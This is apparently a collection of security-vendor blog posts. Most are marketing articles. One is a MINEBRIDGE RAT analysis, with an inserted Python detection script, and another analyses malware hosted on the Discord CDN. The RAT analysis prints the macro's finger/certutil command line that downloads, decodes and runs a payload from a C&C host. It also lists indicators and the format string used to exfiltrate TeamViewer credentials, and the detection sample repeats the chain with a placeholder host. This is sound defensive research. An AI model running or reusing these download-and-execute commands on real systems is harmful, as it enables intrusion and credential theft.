Security. Communication. Collaboration. These were the three areas that companies invested in most since the beginning of last year. Don’t just take my word for it—reports from both Microsoft and Okta provide insight into the most popular enterprise applications being used to support remote work for business.

Zero trust is growing just as quickly as collaboration

For years, we have talked about the importance of zero trust for access to apps and its two key foundational elements: identity, and the use of business policies (that can adapt as needed) when it comes to securing user access to critical business services. Identity is the passport needed to determine who a specific user is (no implicit trust of IP address). Business policies are set by IT teams and determine which authorized users can access which specific applications. These policies are enforced, and the user-to-app connection brokered, by a zero trust exchange service. These business policies follow the user no matter where they are—at home, at their favorite cafe, their Airbnb, or back at the office (hopefully someday soon).
As employees join companies, leave companies, and devices get lost or become infected by malware, etc., those business policies then automatically adapt using APIs shared across zero trust ecosystem players like Zscaler, CrowdStrike, Microsoft, Okta, and Splunk. For example, this is where our investment in SCIM 2.0 supporting Microsoft, Okta, and others, becomes incredibly useful to our customers. If an employee leaves the company, we consume that information from the IDP, and use SCIM 2.0 to revoke access. We can then view logs in real time and automatically stream them out to a SIEM server for further SOC analysis. We purposely designed our Zscaler platform to be able to integrate with popular identity providers like Microsoft Azure Active Directory, Okta, Ping, and several other SAML-based IDP solutions because we believe in the importance of zero trust within the enterprise.

So, when I look at the findings from both Microsoft and Okta, two identity juggernauts, the most exciting sub-story that immediately jumps out to me is the fact that zero trust solutions are among the fastest-growing apps on the market–and Zscaler is one of the top solutions!

The state of apps by Microsoft identity (Zscaler is #4)

Okta Business at Work Report

Zero trust, no matter where users are

The value of adopting a zero trust strategy has become more evident than ever during COVID-19 life, but one important tip I give to customers is to not make the mistake of thinking zero trust is only valid for remote work. Many customers have told me about the prospect of building plans to support a new, hybrid workforce where employees have the ability to work two days remote and three days in the office.
For many IT teams, this still remains to be seen, but whatever the case may be, it’s important to not revert back to traditional methods of connectivity that treat remote employee access to apps differently from in-office employee access, and imply trust by allowing users to connect onto the network using VPN, or simply by residing in the office. FIGHT THE URGE TO DO THIS. I remind them that now that they’ve replaced their remote access VPN (or perhaps plan to soon) with a zero trust solution, they can also use that same zero trust solution to bring employees back to the office safely and securely. The great thing about identity and business policies is that they are omnipresent—they follow the user wherever they go. So why not take advantage of that? Fewer products for the customer to manage, a seamless user experience from everywhere, and, of course, zero trust access to the business services employees need—who doesn’t want that?

The mass transition to zero trust has already begun, and I am looking forward to its continued adoption within the enterprise–especially when the world begins to open back up.

Wed, 10 Feb 2021 08:00:02 -0800
Christopher Hines

Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures

Introduction

In Jan 2021, Zscaler ThreatLabZ discovered new instances of the MINEBRIDGE remote-access Trojan (RAT) embedded in macro-based Word document files crafted to look like valid job resumes (CVs). Such lures are used as social engineering schemes by threat actors; in this case, the malware was targeted at security researchers. MINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to take a wide array of remote follow-on actions such as spying on users or deploying additional malware. We have recently observed other instances of threat actors targeting security researchers with social engineering techniques.
While the threat actor we discuss in this blog is not the same, the use of social engineering tactics targeting security teams appears to be on an upward trend. We also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last instance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes in TTPs, threat attribution, command-and-control (C&C) infrastructure, and a technical analysis of the attack flow.

Threat attribution

This attack was likely carried out by TA505, a financially motivated threat group that has been active since at least 2014. TA505 has been previously linked to very similar attacks using MINEBRIDGE RAT. The job resume theme and C&C infrastructure used in this new instance are consistent and in line with these former attacks. Due to the low volume of samples we identified for this new attack, we attribute it to the same threat actor with a moderate confidence level.

Attack flow

Figure 1 below details the attack flow.

Figure 1: Attack flow

Macro technical analysis

For the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the MD5 hash: f95643710018c437754b8a11cc943348

When the Word document is opened and the macros are enabled, it displays the message “File successfully converted from PDF” for social engineering purposes. This message is followed by displaying the decoy document as shown below. Figure 2 shows the contents of the decoy document, which resemble a job resume (CV) of a threat intelligence analyst.

Figure 2: Decoy files using the CV of a security researcher for social engineering purposes

The macro code uses basic string obfuscation as shown in Figure 3.

Figure 3: Contents of the obfuscated macro

It constructs the following command line and then executes it using Windows Management Instrumentation (WMI).
Command line:

    cmd /C finger nc20@ > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe

This command leverages the Windows utility finger.exe to download encoded content from the IP address: and drops it in the %appdata% directory. The encoded content is decoded using the legitimate Windows utility certutil.exe and executed. The usage of finger.exe to download the encoded content from the C&C server is one of the major TTP changes by this threat actor. We see an increase in usage of living-off-the-land binaries (LOLBins) by the threat actor to download, decode, and execute the content in this new instance.

Stage 1: SFX archive

The content decoded using certutil.exe is a self-extracting archive (SFX), which we describe in this section of the blog.

MD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a

Contents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application.

Figure 4: Contents of the SFX archive

Upon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs, and some document files. Execution flow starts with the binary called defrender.exe, which is masked to appear as a Windows Defender binary.

Stage 2: DLL side loading

The dropped binary defrender.exe is a legitimate TeamViewer application, version 11.2.2150.0, which is vulnerable to DLL side loading. Upon execution, it loads the msi.dll binary present in the same directory. The msi.dll is the file that performs further malicious activity in the system. Next, msi.dll unpacks a shellcode and executes it. The part of the code responsible for shellcode unpacking and execution is shown in Figure 5.

Figure 5: Shellcode unpacking and execution

The shellcode further unpacks another DLL with MD5 hash 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into memory, and finally transfers code execution to its entry point.
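As an added example (not part of the original ThreatLabZ analysis), the following Python scores constructed, Sysmon-style telemetry for the two stage-one signals described above: a cmd.exe command line that chains a finger.exe download, a certutil.exe -decode, and execution of the decoded file, and msi.dll being loaded from outside the Windows system directories by a side-loading host such as defrender.exe. The event field names, the WmiPrvSE.exe parent process and the C2_IP_PLACEHOLDER host are assumptions and placeholders, not values from the report.

```python
"""Detection logic for the MINEBRIDGE stage-one behaviours (added example).

Events are plain dicts in a Sysmon-like shape; the field names
(event, image, parent_image, command_line, image_loaded) are an assumption
and should be mapped onto your own EDR/SIEM schema.
"""
import re

# Only these two locations legitimately host msi.dll on Windows.
LEGIT_MSI_PATHS = (r"c:\windows\system32\msi.dll", r"c:\windows\syswow64\msi.dll")

# finger <user>@<host> with stdout redirected to a file = network fetch via a LOLBin.
FINGER_DL = re.compile(r"\bfinger(?:\.exe)?\s+(\S+@\S*)\s*>+\s*(\S+)", re.I)
# certutil -decode <encoded input> <decoded output>
CERTUTIL_DECODE = re.compile(r"\bcertutil(?:\.exe)?\s+-decode\s+(\S+)\s+(\S+)", re.I)
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com")


def split_stages(cmdline):
    """Split a cmd.exe command line on its '&&' / '&' chaining operators."""
    return [s.strip() for s in re.split(r"\s*&&\s*|\s*&\s*", cmdline) if s.strip()]


def analyze_command_line(cmdline):
    """Look for the download -> decode -> execute pattern inside one command line."""
    result = {"finger_download": None, "certutil_decode": None,
              "executes_decoded": False, "verdict": "clean"}
    decoded_path = None
    for stage in split_stages(cmdline):
        m = FINGER_DL.search(stage)
        if m:
            result["finger_download"] = m.group(2)   # file the fetched data lands in
            continue
        m = CERTUTIL_DECODE.search(stage)
        if m:
            decoded_path = m.group(2)
            result["certutil_decode"] = (m.group(1), decoded_path)
            continue
        # A later stage that invokes the freshly decoded file directly.
        if decoded_path and stage.strip('"').lower().startswith(decoded_path.lower()):
            result["executes_decoded"] = True
    if result["finger_download"] and result["certutil_decode"] and result["executes_decoded"]:
        result["verdict"] = "staging_chain"
    elif result["finger_download"] or (
            decoded_path and decoded_path.lower().endswith(EXECUTABLE_EXT)):
        result["verdict"] = "suspicious"
    return result


def is_msi_sideload(image_loaded):
    """True when msi.dll is loaded from anywhere other than the system directories."""
    path = image_loaded.lower()
    return path.endswith("\\msi.dll") and path not in LEGIT_MSI_PATHS


def triage(events):
    """Return one alert dict per event that matches a rule, in event order."""
    alerts = []
    for ev in events:
        if ev["event"] == "process_create":
            finding = analyze_command_line(ev["command_line"])
            if finding["verdict"] == "staging_chain":
                alerts.append({"rule": "lolbin_staging_chain", "image": ev["image"],
                               "parent": ev.get("parent_image"), "detail": finding})
            elif finding["verdict"] == "suspicious":
                alerts.append({"rule": "lolbin_suspicious", "image": ev["image"],
                               "parent": ev.get("parent_image"), "detail": finding})
        elif ev["event"] == "image_load" and is_msi_sideload(ev["image_loaded"]):
            alerts.append({"rule": "msi_dll_sideload", "image": ev["image"],
                           "detail": ev["image_loaded"]})
    return alerts


# Constructed sample telemetry. The command line is the one from the macro above
# with C2_IP_PLACEHOLDER standing in for the (unpublished) C&C address; the
# WMI provider host as parent is an assumption about how WMI-launched commands appear.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd /C finger nc20@C2_IP_PLACEHOLDER > %appdata%\vUCooUr >> %appdata%\vUCooUr1 "
                     r"&& certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe "
                     r"&&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe"},
    {"event": "image_load", "image": r"C:\ProgramData\Local Tempary\defrender.exe",
     "image_loaded": r"C:\ProgramData\Local Tempary\msi.dll"},       # side-loaded
    {"event": "image_load", "image": r"C:\Windows\System32\msiexec.exe",
     "image_loaded": r"C:\Windows\System32\msi.dll"},                 # legitimate
    {"event": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",                      # benign decode
     "command_line": r"cmd /C certutil -decode C:\Users\alice\cert.b64 C:\Users\alice\cert.cer"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["rule"], alert["image"], alert["detail"])
```

The benign certutil decode of a .cer file stays "clean", so the rules key on the chain and on executable output rather than on certutil.exe alone.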
The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.

Stage 3: MINEBRIDGE RAT DLL

On unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash: 23edc18075533a4bb79b7c4ef71ff314

Execution checks

At the very beginning, MINEBRIDGE RAT confirms that the DLL is not executed via either regsvr32.exe or rundll32.exe. Then it checks the command-line argument and performs the following operations:

- If the command-line argument is __RESTART__, it sleeps for 5 seconds and then performs the operations described further below.
- If the command-line argument is __START__, it starts a BITS job to download a zip file-based payload and then performs the operations described further below.

Figure 6 shows the relevant command-line checks performed by MINEBRIDGE RAT.

Figure 6: Module name and command-line argument check / BITS job download

The BITS job downloads a zip file by selecting a random C&C domain from the hardcoded list inside the DLL, using the path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded DLL is dropped to a hardcoded filename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. When the download is completed, the zip file is extracted to “%ProgramData%\VolumeDrive\”. Figure 7 shows the relevant code section responsible for using bitsadmin to download the payload.

Figure 7: BITS job to download the payload file and extract it to %ProgramData%\VolumeDrive\

After performing the above-mentioned checks, it loads the legitimate MSI.dll from the %System32% directory to initialize its own Export Address Table. This is done to prevent application crashes when any of the export functions are called. It then generates the BOT_ID after doing some computations with the VolumeSerialNumber.
Figure 8: Export address table initialization and BOT_ID generation

API hooking

MINEBRIDGE RAT then uses the mHook module to hook the following APIs, intercepting function calls in order to avoid accidental exposure of malicious code execution to the user:

MessageBoxA
MessageBoxW
SetWindowTextW
IsWindowVisible
DialogBoxParamW
ShowWindow
RegisterClassExW
CreateWindowExW
CreateDialogParamW
Shell_NotifyIconW
ShellExecuteExW
GetAdaptersInfo
RegCreateKeyExW
SetCurrentDirectoryW
CreateMutexW
CreateMutexA
CreateFileW
GetVolumeInformationW

Since the last observed instance of this attack in 2020, a few more APIs have been added to the hook list, which are highlighted in bold above -- but interestingly, the project path leaked by the mHook module remains unchanged:

C:\users\maximys\desktop\\mhook_lib\mhook_lib\disasm-lib\disasm.c

Finally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three threads in sequence that perform the following tasks:

1. The first thread is responsible for C&C communication and achieving persistence.
2. The second thread checks when the last user input was received in order to determine system idle status.
3. The third thread kills the ShowNotificationDialog process regularly to avoid any notification popups.

Figure 9: Hooks APIs and creates threads

Persistence

For persistence, MINEBRIDGE RAT creates a LNK file with the name “Windows Logon.lnk” in the startup directory. The LNK file points to the currently executing binary, with the same icon as “wlrmdr.exe” and the description “Windows Logon”.

Figure 10: LNK file properties showing target path and icon source

C&C communication

MINEBRIDGE RAT supports the following C&C commands:

● drun_command
● rundll_command
● update_command
● restart_command
● terminate_command
● kill_command
● poweroff_command
● reboot_command
● Setinterval_command

At the time of analysis, we didn’t receive any active response from the C2 server.
However, based on the code flow, the communication mechanism seems to be the same as in previously reported attack instances. Detailed analysis of C2 communication can be found in this report.

Alternate attack flow

The MINEBRIDGE RAT DLL also supports being executed via regsvr32.exe. The malicious code is present inside the DllRegisterServer export. When executed via regsvr32.exe or rundll32.exe, the DllMain routine won’t perform any actions, but regsvr32.exe also calls the DllRegisterServer export implicitly and, hence, the malicious code inside the DllRegisterServer export gets executed. Interestingly, the check at the very beginning of the code inside the DllRegisterServer export verifies that the process name is regsvr32.exe and only then executes the code further. We didn’t see this code path using regsvr32.exe trigger in the current attack instance, but it fits with what has been reported in earlier instances from FireEye and the advisory report, with a few changes in filenames and payload directory.

Figure 11: Payload download from DllRegisterServer export

Zscaler Cloud Sandbox report

Figure 12 shows the sandbox detection for the macro-based document used in the attack.

Figure 12: Zscaler Cloud Sandbox detection

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels:
Win32.Backdoor.MINEBRIDGE
VBA.Downloader.MINEBRIDGE

MITRE ATT&CK TTP mapping

ID | Tactic/Technique | Description
T1566.001 | Spearphishing Attachment | Uses doc-based attachments with VBA macro
T1204.002 | User Execution: Malicious File | User opens the document file and enables the VBA macro
T1547.001 | Registry Run Keys / Startup Folder | Creates LNK file in the startup folder for payload execution
T1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads
T1036.005 | Masquerading: Match Legitimate Name or Location | File name used similar to legit Windows Defender binary
T1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers
T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses legit TeamViewer binary with DLL side-loading vulnerability
T1218 | Signed Binary Proxy Execution | Uses finger.exe for encoded payload download and certutil.exe to decode the payload
T1056.002 | Input Capture: GUI Input Capture | Captures TeamViewer-generated UserID and Password by hooking GUI APIs
T1057 | Process Discovery | Verifies the name of parent process
T1082 | System Information Discovery | Gathers system OS version info
T1033 | System Owner/User Discovery | Gathers currently logged in Username
T1071.001 | Application Layer Protocol: Web Protocols | Uses https for C&C communication
T1041 | Exfiltration Over C&C Channel | Data is exfiltrated using existing C2 channel

Indicators of compromise

Document hashes
f95643710018c437754b8a11cc943348
41c8f361278188b77f96c868861c111e

Filenames
MarisaCV.doc
RicardoITCV.doc

Binary hashes
73b7b416d3e5b1ed0aa49bda20f7729a [SFX Archive]
d12c80de0cf5459d96dfca4924f65144 [msi.dll]
59876020bb9b99e9de93f1dd2b14c7e7 [UPX packed MineBridge RAT]
23edc18075533a4bb79b7c4ef71ff314 [Unpacked MineBridge RAT]

C&C domains
// Below is a comprehensive list of C&C domains related to this threat actor

Network paths
// The network paths below are accessed by MineBridge RAT either using HTTP GET or POST requests
/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin
/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin
/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php

User-agent:
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1"

Network data fetch using finger.exe
// Format: username@ip_address
nc20@

Downloaded files
// Payloads are dropped in following paths
%temp%/~f834ygf8yrubgfy4sd23.bin
%temp%/~t62btc7rbg763vbywgr6734.bin
%appdata%\vUCooUr1
%appdata%\vUCooUr.exe
%programdata%\Local Tempary\defrender.exe
%programdata%\Local Tempary\msi.dll
%programdata%\Local Tempary\TeamViewer_Desktop.exe
%programdata%\Local Tempary\TeamViewer_Resource_en.dll
%programdata%\Local Tempary\TeamViewer_StaticRes.dll
{STARTUP}\Windows Logon.lnk

Exfiltrated user and system info
// Format string
uuid=%s&id=%s&pass=%s&username=%s&pcname=%s&osver=%s&timeout=%d

The table below summarises the meaning of the individual fields.

Field name | Purpose
uuid | BOT-ID of the user
id | TeamViewer ID of the user
pass | TeamViewer password
username | Currently logged in user name
pcname | Name of the computer
osver | Operating system version
timeout | Timeout between requests

Tue, 23 Feb 2021 05:00:01 -0800
Sudeep Singh

Will CASB Provide All the Security Your Agency Needs?

Cloud access security brokers (CASBs) extend an agency’s security policy to third-party cloud services, providing visibility into the cloud services an agency uses and then building policies to control the usage of sanctioned versus unsanctioned cloud apps. That makes a CASB a critical cloud security tool. But is it enough on its own for the federal government’s data security needs? The answer is sometimes yes and sometimes no. Why? Because CASBs do not provide security protection features, such as (but not limited to) web content filtering and advanced threat protection. For that level of security, the CASB needs to be bundled with a secure web gateway (SWG).
An SWG protects enterprises and users from cyberthreats while enforcing corporate policies. A cloud-delivered SWG may also implement functionalities found in CASB through its inherent deployment model—inline visibility provides protection and enforcement for cloud apps. It is imperative to determine if:

- CASB alone will meet your agency’s needs
- You need an SWG that includes CASB functionality, or
- You need to work with a CASB provider that partners with SWG vendors

The first step is to look at the four implementation areas for CASB solutions in the market today: forward proxy, reverse proxy, out-of-band CASB, and log parsing. The next step is to look at how stand-alone CASB works with each.

Stand-alone CASB does not support forward proxy

There is no forward proxy service that exists as part of a platform to provide active blocking and protection. Some CASB providers partner with an SWG security vendor to integrate with the log parsing scenario. For example, Microsoft partners with Zscaler to provide the SWG for its Microsoft Cloud App Security (MCAS). In 2019, Zscaler was awarded the Microsoft Technology Partner of the Year in part because of the integration we built with MCAS.

Stand-alone CASB does not support reverse proxy

There is no reverse proxy capability as part of a CASB service. An SWG can enable this use case through the identity proxy functionality. This capability enables an agency to build policy from within the vendor’s app that prevents a user from signing on to a protected cloud application unless the traffic to the cloud application is sourced from the vendor.

Stand-alone CASB does not support out-of-band CASB

Out-of-band CASB is accomplished through an API-based approach for connecting to supported cloud app services and scanning content at rest, as well as through activity indicators associated with supported cloud apps. Blocking capabilities are subject to the limitations of the supported cloud service partners.
That means only a subset of integrations may support the app functions.

Stand-alone CASB and log parsing

MCAS covers log parsing via the use of a log ingestion service. This is handled through one of the following approaches:

- A log connector VM in a Docker container, in which web traffic logs are forwarded via syslog/CDF/etc. to the log connector VM
- An FTP ingestion service where logs are uploaded
- Manual log import through their web portal

Log parsing only provides visibility into traffic violations (for example, users accessing an unsanctioned cloud app) and configuration of governance policies around which cloud apps are blocked. There is no actual blocking of the traffic (enforcement) function. A technician, such as a SOC resource, needs to perform that function manually to correlate cloud app usage and identify violations—based on the log data fed to the CASB—to a policy (block script) on a third-party traffic inspection device, such as a web content filter or firewall. There is no way to correlate and validate that a third-party device has all the blocks that are configured in the CASB without doing a manual audit. That enforcement/blocking function would need to be scripted manually if the CASB vendor does not have out-of-the-box integrations for third-party tools.

Conclusion

CASB is a fantastic tool that every federal agency should be using to make data more secure. However, it does not meet all of an agency’s security needs by itself. When sourcing a CASB solution, make sure your vendor of choice has an integrated SWG or is partnering with a provider that does.

Download the full solution brief to see how Zscaler CASB can boost your agency's security.

Thu, 04 Feb 2021 08:00:01 -0800
Matt Moulton

A Resolution for 2021: More Focus on the Attack Surface

The rise of successful ransomware attacks in 2020 speaks volumes: Companies have either lost sight of potential gateways for online attacks, or never had a handle on them in the first place.
Hackers often use information listed publicly on corporate websites to obtain insights into an organisation’s network infrastructure and use this knowledge to their advantage when delivering attacks. Attackers simply collect all the clues—which are available in the public domain—and then install malware and steal confidential data. This year, all IT departments should set themselves a resolution: 2021 is the year to trace and minimise all attack vectors.

From a security perspective it’s a well-known fact that companies expose more information about their infrastructure online than they should. An incorrectly configured service leaves traces on the web, while poorly secured development environments virtually invite attackers in, giving them access to shared meeting calendars, media files, and even routers—which can also expose data. Worse, hardware infrastructure connected to the internet makes it incredibly easy for attackers to find out more about the infrastructure of a company. A firewall, for example, might act as a boundary between the internal and external network—but in doing so, it can unintentionally give external parties insight into the company structure by openly publicising network names or domains used in internal environments.

This kind of open-source intelligence (OSINT) on infrastructure hostnames, such as or, allows attackers to glean information about remote access services or VPN access in Europe. Resources with access restrictions, such as for live databases or for access portals, also allow hackers to collect information about companies online, and this information can then be used to determine potential points of entry for attack. This kind of data is freely available online—often without the affected company being aware of the risks involved. Hackers use this publicly accessible information to identify weaknesses and access points in the company network.
Companies unaware of attack vectors

There are many reasons why companies have lost sight of the potential attack surfaces hidden in plain sight within their own IT infrastructure. The exceptional circumstances of the past year have undoubtedly contributed to the fact that companies are publishing more information than necessary about their remote access infrastructure online. In 2020, companies were forced to rapidly make systems available to staff via remote access on a huge scale. But the problem cannot be attributed solely to the impact of the global health crisis; there are many other reasons why companies can easily lose sight of their IT infrastructure. Possible dangers include employees with responsibility for maintaining network assets leaving the company, outdated infrastructure components that are forgotten about and that no one has responsibility for, or a basic lack of processes and inventories for existing network components and online services.

Risks can also arise from development environments, which are frequently less secure than production environments. The fact that virtually anyone can set up a service is also a threat. If the person setting up the service is not an expert, if the work is haphazard, or if responsibilities are not clearly defined, dangerous and uncontrolled proliferation online becomes the price for simplicity. Companies must understand that any online service could be visible to anyone. This means that any internet user could come knocking on the company’s online door and—if the security solutions in place are not adequate—cross the threshold into the network completely unquestioned.

The right way to handle online expansion

Putting information in the public domain and entering into a dialogue with others about it is part and parcel of using the internet. However, all services and assets must be protected with appropriate security measures.
An online shopping website needs to be accessible to users, but it should not provide unnecessary access to information such as a customer database. The first decision that companies need to make when choosing their security solution is which information they wish to make available to everyone and which data should only be available to a restricted circle of users.

The number-one priority when reducing gateways for an attack is to define security levels for different user groups. Drawing a distinction between internal and external target audiences can serve as the basic framework for categorisation. Internally, certain groups will need access to applications while the support team will need more comprehensive access rights. The administrators who manage the applications will also require enhanced rights. Access must be defined on a granular level. Externally, a distinction should be made between user scenarios involving customers or other third parties. For each user base, companies must develop a controlled security level based on granular segmentation, specific to the user group's needs.

For companies, the challenge with this kind of setup lies in its complexity. Traditional segmentation techniques based on manual interaction increase the risk of errors. The zero trust principle for automated security can be a solution to this dilemma. Based on the user's identity and access rights, the system can isolate the services and data that the user needs. This principle can be deployed in cloud-based services and applications as well as in physical networks. By isolating and segmenting at the level of individual applications, the risk of attackers who manage to get into the system and manoeuvre their way laterally across the company network is eliminated. To pursue this segmentation concept, companies first need to do their homework and fully understand how their infrastructure is exposed online.
Analysing attack gateways

All services or hardware hosted online provide a potential attack surface. Companies must obtain a full picture of what is exposed online before they can put the necessary security in place. Tools that identify this open-source intelligence and highlight where action needs to be taken can be helpful in this process. Not everything that can be accessed online needs to be there, unsecured, and available to everyone. Only when a company understands its open attack vectors can it take action on security and establish appropriate segmentation and isolation rules for applications via a zero trust model. This will ensure that applications can only be accessed by authorised users—closing the doors to attackers.

To learn about your attack surface, contact us for an internet attack surface analysis, which queries public sources to uncover the servers, namespaces, vulnerabilities, and cloud instances that are currently visible to the open internet.

Additional resources:

- Learn how to prevent cloud misconfigurations automatically with Zscaler Cloud Security Posture Management (CSPM).
- Learn how Zscaler Workload Segmentation enables zero trust security to prevent lateral movement and stop threats.
- Read about the five attributes of the Zero Trust Exchange.

Thu, 04 Feb 2021 05:00:01 -0800
Nathan Howe

My Journey That Began at IIT (BHU)

Yesterday, I had the distinct pleasure of addressing the graduates of my alma mater, the Indian Institute of Technology (BHU) in Varanasi. I’ve spoken to many audiences over the past decades about my personal history and perspectives on emerging technologies, security, entrepreneurship, and leadership, but this convocation address was truly special for me. (I invite you to view the video recording below.)

The first time I arrived on the IIT campus to study electronics engineering was more than 40 years ago. It hadn’t been my idea to attend; I had been encouraged by my teachers who believed in my capabilities.
The university shaped me in part due to the rigor of the work, but also due to the people I met who would become lifelong friends and colleagues. After graduating, I received a scholarship from the University of Cincinnati, where I earned an MS in Computer Engineering, an MS in Industrial Engineering, and an MBA in Marketing. In recent years, I have been honored by IIT (BHU) with two awards: Alumnus of the year (2015) and Alumnus of the Century in Making (2019). I am humbled by the recognition, and grateful for IIT’s invitation to speak to this year’s graduating class, allowing me to share important life lessons that began at IIT and helped shape my path forward. I had the opportunity to join great companies—IBM, NCR, and Unisys—and worked for 10 years in various technology roles, including engineering, sales, marketing, and management. It was at this time that internet adoption was beginning to skyrocket in the U.S. I was fascinated by the internet, as was every entrepreneur at the time, but my interest was different from the others I knew. This is where my first life lesson really emerged: Take risks and dream big. My family had no history of entrepreneurship. But in the mid-1990s, as the internet was just taking off and internet startups including Netscape had just gone public, I asked myself: Why can’t I do a startup? Instead of viewing the internet at the time as simply a vehicle for commerce, I saw an opportunity to help companies navigate the new security challenges they would face with internet technologies. After pitching my ideas to venture capitalists and failing to raise funding, my wife, Jyoti, and I made the decision to put our life savings into a startup we called SecureIT. I managed sales and marketing, and Jyoti managed finance, human resources, and company operations. As anyone who has started a company can attest, the hours are long and the strain on the family can be difficult. 
In that way, we were lucky, because Jyoti and I, with our complementary skills, were together 24 hours a day. In 1998, SecureIT was acquired by VeriSign, and most of its employees were able to reap the rewards of their hard work and dedication. The experience with SecureIT taught me a lot about my ambitions and the factors that truly motivated me. I was driven by the sense of accomplishment that came with bringing an idea to life. My advice to young entrepreneurs—to anyone—is to follow your passion. Engage in fulfilling work that boosts your energy instead of sapping it. My second life lesson and one of my favorite mantras is: Uncover your passion and pursue it. If you love what you do, you’ll never work a day in your life. My passion for building and executing fueled three more startups. One was an early SaaS provider, two were in security, and all three were eventually acquired. Even with the success of these companies, I remained driven by the desire to build something new. But as I looked to my next venture, I had a different purpose and I approached it with a changed mindset. I wanted to build something lasting. At the time, enterprises were starting to use the internet as something more than a communications medium. They were conducting business operations over the internet, using services such as Salesforce for CRM and Amazon EC2 for big data analytics and other compute-intensive work. The enterprises had invested heavily in security technologies that provided a secure perimeter around the network, but with more business traffic moving over the internet and more employees using mobile devices off the network, the traditional network security paradigm was on its way to becoming obsolete. About a decade after I graduated, I was at a conference in San Jose, California, and heard a voice that I recognized. It was actually the laugh of K. 
Kailash, my classmate at IIT (BHU), a brilliant computer scientist, and exactly the person who could help me realize my vision for transforming the security industry. Together, we started what would become Zscaler, the first cloud-native security-as-a-service provider. It was not easy to convince IT leaders that moving their security from the data center to the cloud would decrease risk, improve performance for users, and reduce costs and complexity. But those who saw the promise of cloud-delivered security also saw immediate benefits. Today, over 4,500 enterprises around the world trust Zscaler to help them securely transform their legacy network and security infrastructures for the modern, digital era. Starting Zscaler in 2007, launching our platform and serving customers starting in 2008, going public in 2018, growing to 2,500 employees in 2021, earning industry recognition year after year, and innovating every day—it’s all been the journey of a lifetime, and it all began at IIT. I encourage today’s graduates to consider these two life lessons as they forge their own paths: uncover your passion and pursue it, and take risks and dream big. Mon, 08 Feb 2021 08:00:01 -0800 Jay Chaudhry Discord CDN: A Popular Choice for Hosting Malicious Payloads Introduction Since the onset of the pandemic, the internet has become a central part of our lives. People of all ages turned online for school and work, to stream videos, to play video games, have virtual get-togethers, shop, talk to their doctor, and engage in any number of other activities. During 2020, research showed a sharp increase in game downloads, and this activity did not go unnoticed by cybercriminals. Attackers have often exploited the popularity of certain games (Among Us was a recent example) to lure players into downloading fake versions that served malware. Recently, the Zscaler ThreatLabZ team noticed new campaigns in which cybercriminals are targeting gamers. 
The key findings of our research include:
- Multiple campaigns relying on the service for their infection chain.
- Cybercriminals are using Discord CDN to host malicious files as well as for command-and-control (C&C) communication.
- Malicious files are renamed as pirated software or gaming software to trick gamers.
- File icons are also related to gaming software to trick gamers.
- Multiple categories of malware are being served through the Discord app’s CDN infrastructure: ransomware, stealers, and cryptominers.
The attack usually starts with spam emails in which users are tricked with legitimate-looking templates into downloading next-stage payloads. It’s worth noting, however, that using Discord to host payloads is not new. This campaign uses Discord services to form a URL to host malicious payloads as follows:
Figure 1: Malicious files blocked in the Zscaler cloud served via
Technical Analysis
Discord is a chat application that allows users to chat with each other in real time. Users can communicate with voice calls, chat messages, and video calls, and send files to one another. But attackers also use Discord, often to distribute malicious files and steal information. This CDN service was actually started as a content distribution network for serving static content to users, but it has revealed some considerable risks. For example, an attacker can upload a malicious file on a Discord channel and share its public link with others—even non-Discord users can download it. Worse, a file sent from Discord is there forever, so even if an attacker deletes a file within Discord, its link can still be used to download the malicious file.
Figure 2: Infection chain of different malware on
We have seen multiple payloads being used in recent campaigns, primarily consisting of these four:
- Epsilon ransomware
- Redline stealer
- XMRig miner
- Discord token grabbers
Epsilon ransomware (MD5: f509bd9e1fbd7721c95d0d19ba317b03)
We have analyzed the Epsilon ransomware loader, in which execution starts with dropping an .inf file and an .exe file in the Windows/Temp folder. The dropped payload performs the following actions upon execution.
Figure 3: Payload functionality
- persistence() - Establishes persistence on the victim machine
- encryptionStage() - Encrypts files
- wallpap() - Downloads the ransom image from Discord
- extract() - Downloads the ransom note from Discord
- sapi() - Displays the ransom note
- x3() - Deletes shadow copies (recovery files)
- clearmem() - Cleans memory
- Exit() - Quits the application
The malware establishes persistence by creating the following registry key on the victim's machine:
Figure 4: Run key entry for persistence
It enumerates the system drives to encrypt the files using double encryption. First, it encrypts the files with AES encryption using a randomly generated 32-bit key. Then, those encrypted files are encrypted again with the RC4 algorithm using a randomly generated 256-bit key.
